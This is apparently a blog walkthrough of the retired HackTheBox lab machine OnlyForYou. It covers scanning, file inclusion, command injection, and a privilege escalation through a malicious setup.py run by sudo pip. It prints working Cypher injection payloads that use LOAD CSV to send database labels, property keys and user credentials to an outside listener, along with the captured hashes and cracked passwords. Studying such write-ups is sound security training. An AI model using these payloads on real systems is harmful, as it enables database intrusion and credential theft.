Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - OnlyForYou
|htbmachinesretired|

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.93 scan initiated Sun Apr 23 00:35:33 2023 as: nmap -vvvv -sC -sV -oN nmap/onlyforyou 10.129.63.32
Nmap scan report for onlyforyou.htb (10.129.63.32)
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2023-04-23 00:35:33 IST for 19s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX7r34pmJ6U9KrHg0/WDdrofcOXqTr13Iix+3D5ChuYwY2fmqIBlfuDo0Cz0xLnb/jaT3ODuDtmAih6unQluWw3RAf03l/tHxXfvXlWBE3I7uDu+roHQM7+hyShn+559JweJlofiYKHjaErMp33DI22BjviMrCGabALgWALCwjqaV7Dt6ogSllj+09trFFwr2xzzrqhQVMdUdljle99R41Hzle7QTl4maonlUAdd2Ok41ACIu/N2G/iE61snOmAzYXGE8X6/7eqynhkC4AaWgV8h0CwLeCCMj4giBgOo6EvyJCBgoMp/wH/90U477WiJQZrjO9vgrh2/cjLDDowpKJDrDIcDWdh0aE42JVAWuu7IDrv0oKBLGlyznE1eZsX2u1FH8EGYXkl58GrmFbyIT83HsXjF1+rapAUtG0Zi9JskF/DPy5+1HDWJShfwhLsfqMuuyEdotL4Vzw8ZWCIQ4TVXMUwFfVkvf410tIFYEUaVk5f9pVVfYvQsCULQb+/uc=
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAz/tMC3s/5jKIZRgBD078k7/6DY8NBXEE8ytGQd9DjIIvZdSpwyOzeLABxydMR79kDrMyX+vTP0VY5132jMo5w=
|   256 445f7aa377690a77789b04e09f11db80 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOqatISwZi/EOVbwqfFbhx22EEv6f+8YgmQFknTvg0wr
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 23 00:35:52 2023 -- 1 IP address (1 host up) scanned in 19.75 seconds

Web

we find

in the footer

Sending a message

We see we get You are not authorized

Looking around on the page for link

i find beta.only4you.htb


beta.only4you.htb

We find the source code zip

along with two functionality image convert and image resize

And on the download we find a LFI

Command Injection

We see the use Suprocess.run which can be used to get a RCE

www-data -> user

Proxing the services we find that the 8001 service is using neo4j as it DB

and trying cypher injection on neo4J we can extract data

Using the injection i can extract the labels as

1
search=' OR 1=1 WITH 1 as a  CALL db.labels() YIELD label  LOAD CSV FROM 'http://10.10.14.3:8000/?name='   label  as l RETURN 0 as _0 //

as user and employee

We get property keys using

1
search=' OR 1=1 WITH 1 as a  CALL  db.propertyKeys() YIELD propertyKey LOAD CSV FROM 'http://10.10.14.3:8000/?label='   propertyKey as l RETURN 0 as _0 //
1
2
3
4
5
6
10.129.63.48 - - [23/Apr/2023 10:47:50] "GET /?label=name HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:50] "GET /?label=country HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:51] "GET /?label=city HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:51] "GET /?label=salary HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:52] "GET /?label=username HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 10:47:53] "GET /?label=password HTTP/1.1" 200 -

What i am intreseted is username and password so lets try to get that.

1
search=' OR 1=1 WITH 1 as a MATCH (u:user) LOAD CSV FROM 'http://10.10.14.3:8000/?u='+u.username+'&password='+u.password as l RETURN 0 as _0 //

We get username and password hashes

1
2
10.129.63.48 - - [23/Apr/2023 11:27:37] "GET /?u=admin&password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.129.63.48 - - [23/Apr/2023 11:27:37] "GET /?u=john&password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -

Cracking the hashes on crackstation we are able to crack both of the password

1
2
admin:admin
john:ThisIs4You

Privilege Escalation

Checking sudo -l

We see we need to download *.tar.gz from gogs server

Lets create a public repo and push a README.md file to it to see the behaviour

after pushing and downloading the

We see it is erroring on setup.py so lets commit tha also with some reverse shell code

and then running sudo pip3 download again on the tar result in setup.py execute and get us a root shell.

Rooted:

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/onlyforyou/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxmedium